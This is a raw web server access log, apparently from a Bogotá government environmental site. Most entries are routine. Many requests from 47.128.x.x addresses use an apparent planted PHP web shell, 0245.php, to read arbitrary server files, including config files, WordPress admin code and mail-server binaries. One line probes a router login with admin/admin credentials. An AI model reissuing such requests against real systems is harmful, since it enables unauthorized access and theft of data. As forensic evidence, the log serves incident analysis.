47.128.27.33 - - [20/Jun/2024:00:58:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1716.pdf&ft=notepad&white=1 HTTP/1.1" 200 413385
201.245.192.253 - - [20/Jun/2024:00:58:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:00:58:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:00:58:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:00:57:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
47.128.31.196 - - [20/Jun/2024:00:59:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_Miquitos.flv&ft=img&white=1 HTTP/1.1" 200 34426639
201.245.192.253 - - [20/Jun/2024:00:59:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [20/Jun/2024:00:59:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:00:59:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.28.109 - - [20/Jun/2024:00:59:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1251-1300%5C&f=00001279.tif&ft=img&white=1 HTTP/1.1" 200 286468
201.245.192.253 - - [20/Jun/2024:01:00:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:00:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.47.125 - - [20/Jun/2024:01:00:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3957.pdf&ft=notepad&white=1 HTTP/1.1" 200 360137
118.123.105.92 - - [20/Jun/2024:01:00:58 -0500] "\x16\x03\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:00:59 -0500] "\x16\x03\x01" 400 226
47.128.96.55 - - [20/Jun/2024:01:01:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1683.pdf&ft=notepad&white=1 HTTP/1.1" 200 417481
201.245.192.253 - - [20/Jun/2024:01:01:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:01:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
118.123.105.92 - - [20/Jun/2024:01:01:58 -0500] "\x16\x03\x03\x01\xa7\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:01:59 -0500] "\x16\x03\x03\x01\xa7\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:01:59 -0500] "\x16\x03\x03\x01X\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:02:00 -0500] "\x16\x03\x03\x01J\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:02:00 -0500] "\x16\x03\x03\x01\x9b\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:02:01 -0500] "\x16\x03\x02\x01\x9c\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:02:02 -0500] "\x16\x03\x01\x01\xa9\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:02:02 -0500] "\x16\x03\x01\x01\xa9\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:02:03 -0500] "\x16\x03\x01\x01\x9f\x01" 400 226
118.123.105.92 - - [20/Jun/2024:01:02:04 -0500] "\x16\x03\x01\x01\xb6\x01" 400 226
47.128.121.13 - - [20/Jun/2024:01:02:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=urlproxy.exe&ft=img&white=1 HTTP/1.1" 200 9360
201.245.192.253 - - [20/Jun/2024:01:02:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:02:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.33.131 - - [20/Jun/2024:01:02:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=admin-functions.php&ft=img&white=1 HTTP/1.1" 200 403
216.245.221.92 - - [20/Jun/2024:01:03:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:03:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.19.61 - - [20/Jun/2024:01:03:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0248.pdf&ft=notepad&white=1 HTTP/1.1" 200 380617
172.22.2.4 - - [20/Jun/2024:01:02:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:03:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:04:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.55.185 - - [20/Jun/2024:01:04:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1863.pdf&ft=notepad&white=1 HTTP/1.1" 200 663241
201.245.192.253 - - [20/Jun/2024:01:04:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:04:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:01:02:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.120.245 - - [20/Jun/2024:01:05:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Csendmail%5C&f=ssleay32.dll&ft=img&white=1 HTTP/1.1" 200 98063
162.55.171.94 - - [20/Jun/2024:01:05:11 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [20/Jun/2024:01:05:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:05:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.27.113 - - [20/Jun/2024:01:05:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2765.pdf&ft=notepad&white=1 HTTP/1.1" 200 397001
201.245.192.253 - - [20/Jun/2024:01:06:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:06:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.17.152 - - [20/Jun/2024:01:06:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1907.pdf&ft=img&white=1 HTTP/1.1" 200 347919
47.128.27.13 - - [20/Jun/2024:01:07:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3293.pdf&ft=notepad&white=1 HTTP/1.1" 200 1109705
201.245.192.253 - - [20/Jun/2024:01:07:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:07:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.126.143 - - [20/Jun/2024:01:08:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3833.pdf&ft=notepad&white=1 HTTP/1.1" 200 405193
201.245.192.253 - - [20/Jun/2024:01:08:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:01:08:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:08:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:01:06:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
47.128.115.253 - - [20/Jun/2024:01:08:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2637.pdf&ft=notepad&white=1 HTTP/1.1" 200 372425
201.245.192.253 - - [20/Jun/2024:01:09:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [20/Jun/2024:01:09:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.228 - - [20/Jun/2024:01:09:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0540.pdf&ft=notepad&white=1 HTTP/1.1" 200 351945
172.22.2.4 - - [20/Jun/2024:01:07:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:09:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [20/Jun/2024:01:09:54 -0500] "GET /BLA/resoluciones/AUTOS%202010/3789.pdf HTTP/1.1" 200 250627
216.244.66.195 - - [20/Jun/2024:01:10:09 -0500] "GET /BLA/resoluciones/AUTOS%202010/4552.pdf HTTP/1.1" 200 177373
47.128.126.141 - - [20/Jun/2024:01:10:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3938.pdf&ft=notepad&white=1 HTTP/1.1" 200 454345
201.245.192.253 - - [20/Jun/2024:01:10:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:01:08:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
201.245.192.253 - - [20/Jun/2024:01:10:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:01:10:38 -0500] "GET /BLA/resoluciones/AUTOS%202010/5321.pdf HTTP/1.1" 200 267565
47.128.51.198 - - [20/Jun/2024:01:11:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5C&f=config.inc.php&ft=img&white=1 HTTP/1.1" 200 1099
216.244.66.195 - - [20/Jun/2024:01:11:10 -0500] "GET /BLA/resoluciones/AUTOS%202010/5359.pdf HTTP/1.1" 200 1998462
201.245.192.253 - - [20/Jun/2024:01:11:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.71 - - [20/Jun/2024:01:11:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002993.tif&white=1 HTTP/1.1" 200 35682
201.245.192.253 - - [20/Jun/2024:01:11:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [20/Jun/2024:01:12:00 -0500] "GET /BLA/resoluciones/AUTOS%202010/6560.pdf HTTP/1.1" 200 323022
201.245.192.253 - - [20/Jun/2024:01:12:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:12:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.35.112 - - [20/Jun/2024:01:12:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5866.pdf&ft=img&white=1 HTTP/1.1" 200 20239
216.244.66.195 - - [20/Jun/2024:01:12:38 -0500] "GET /BLA/resoluciones/AUTOS%202010/6563.pdf HTTP/1.1" 200 116800
216.244.66.195 - - [20/Jun/2024:01:13:09 -0500] "GET /BLA/resoluciones/AUTOS%202010/6710.pdf HTTP/1.1" 200 274755
47.128.126.109 - - [20/Jun/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=ter32.dll&ft=img&white=1 HTTP/1.1" 200 2207503
216.245.221.92 - - [20/Jun/2024:01:13:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:13:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:01:13:40 -0500] "GET /BLA/resoluciones/AUTOS%202010/6918.pdf HTTP/1.1" 200 162547
172.22.2.4 - - [20/Jun/2024:01:13:40 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-693-12.docx HTTP/1.1" 304 -
201.245.192.253 - - [20/Jun/2024:01:13:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.121.88 - - [20/Jun/2024:01:13:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1539.pdf&ft=notepad&white=1 HTTP/1.1" 200 585417
201.245.192.253 - - [20/Jun/2024:01:14:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [20/Jun/2024:01:14:11 -0500] "GET /BLA/resoluciones/AUTOS%202011/3827.pdf HTTP/1.1" 200 230701
201.245.192.253 - - [20/Jun/2024:01:14:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:14:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:01:14:39 -0500] "GET /BLA/resoluciones/AUTOS%202011/3829.pdf HTTP/1.1" 200 262808
47.128.18.223 - - [20/Jun/2024:01:14:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2118.pdf&ft=img&white=1 HTTP/1.1" 200 360207
216.244.66.195 - - [20/Jun/2024:01:15:08 -0500] "GET /BLA/resoluciones/AUTOS%202016/3236.pdf HTTP/1.1" 200 373186
172.22.2.4 - - [20/Jun/2024:01:15:09 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 304 -
172.22.2.4 - - [20/Jun/2024:01:13:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.42.8 - - [20/Jun/2024:01:15:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Ccirculares%5C&f=3-2011-SDA.pdf&ft=notepad&white=1 HTTP/1.1" 200 343747
201.245.192.253 - - [20/Jun/2024:01:15:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [20/Jun/2024:01:15:31 -0500] "GET /BLA/resoluciones/AUTOS%202014/0954.pdf HTTP/1.1" 200 330829
216.244.66.195 - - [20/Jun/2024:01:15:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1323.pdf HTTP/1.1" 200 365305
201.245.192.253 - - [20/Jun/2024:01:15:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.43.103 - - [20/Jun/2024:01:16:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4578.pdf&ft=notepad&white=1 HTTP/1.1" 200 343753
216.244.66.195 - - [20/Jun/2024:01:16:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1351.pdf HTTP/1.1" 200 534548
172.22.2.4 - - [20/Jun/2024:01:14:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
3.12.251.153 - - [20/Jun/2024:01:16:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:16:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:16:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [20/Jun/2024:01:16:31 -0500] "GET /Publicaciones/2024EE96715.pdf HTTP/1.1" 404 227
216.244.66.195 - - [20/Jun/2024:01:16:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1445.pdf HTTP/1.1" 200 563173
47.128.51.102 - - [20/Jun/2024:01:16:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=phpinfo.php&ft=img&white=1 HTTP/1.1" 200 24
201.245.192.253 - - [20/Jun/2024:01:17:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.49 - - [20/Jun/2024:01:17:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0827.pdf HTTP/1.1" 200 663579
216.244.66.195 - - [20/Jun/2024:01:17:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1550.pdf HTTP/1.1" 200 404910
47.128.119.249 - - [20/Jun/2024:01:17:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0364.pdf&ft=notepad&white=1 HTTP/1.1" 200 323273
201.245.192.253 - - [20/Jun/2024:01:17:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [20/Jun/2024:01:18:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1630.pdf HTTP/1.1" 200 593523
172.22.2.4 - - [20/Jun/2024:01:18:18 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Jun/2024:01:18:19 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
201.245.192.253 - - [20/Jun/2024:01:18:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:01:18:27 -0500] "HEAD / HTTP/1.1" 200 -
47.128.50.51 - - [20/Jun/2024:01:18:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2388.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [20/Jun/2024:01:18:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:17:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33232
201.245.192.253 - - [20/Jun/2024:01:18:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34819
81.215.202.162 - - [20/Jun/2024:01:18:44 -0500] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 1019
216.244.66.195 - - [20/Jun/2024:01:18:47 -0500] "GET /bla/resoluciones/RESOLUCIONES%202011/6562.pdf HTTP/1.1" 200 2065007
201.245.192.253 - - [20/Jun/2024:01:19:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.61.91 - - [20/Jun/2024:01:19:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6375.pdf&ft=notepad&white=1 HTTP/1.1" 200 413385
201.245.192.253 - - [20/Jun/2024:01:19:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [20/Jun/2024:01:19:35 -0500] "GET /galeria/galeria/fotos/Humedal-Santa-Mar%C3%ADa-del-Lago1G.jpg HTTP/1.1" 200 290867
201.245.192.253 - - [20/Jun/2024:01:19:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33565
201.245.192.253 - - [20/Jun/2024:01:19:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.120.3 - - [20/Jun/2024:01:19:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+101-150%5C&f=00000148.tif&white=1 HTTP/1.1" 200 220296
216.244.66.195 - - [20/Jun/2024:01:20:06 -0500] "GET /BLA/resoluciones/AUTOS%202019/03315.pdf HTTP/1.1" 200 335346
201.245.192.253 - - [20/Jun/2024:01:20:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:20:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34819
201.245.192.253 - - [20/Jun/2024:01:20:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.57 - - [20/Jun/2024:01:20:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crdc%5C&f=create.php&ft=img&white=1 HTTP/1.1" 200 3605
216.244.66.195 - - [20/Jun/2024:01:20:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6306.pdf HTTP/1.1" 200 8721922
172.22.2.4 - - [20/Jun/2024:01:19:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.96.250 - - [20/Jun/2024:01:21:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4188.pdf&ft=notepad&white=1 HTTP/1.1" 200 372425
201.245.192.253 - - [20/Jun/2024:01:21:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:21:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:01:20:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.54.136 - - [20/Jun/2024:01:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2622.pdf&ft=notepad&white=1 HTTP/1.1" 200 356041
201.245.192.253 - - [20/Jun/2024:01:22:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:22:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
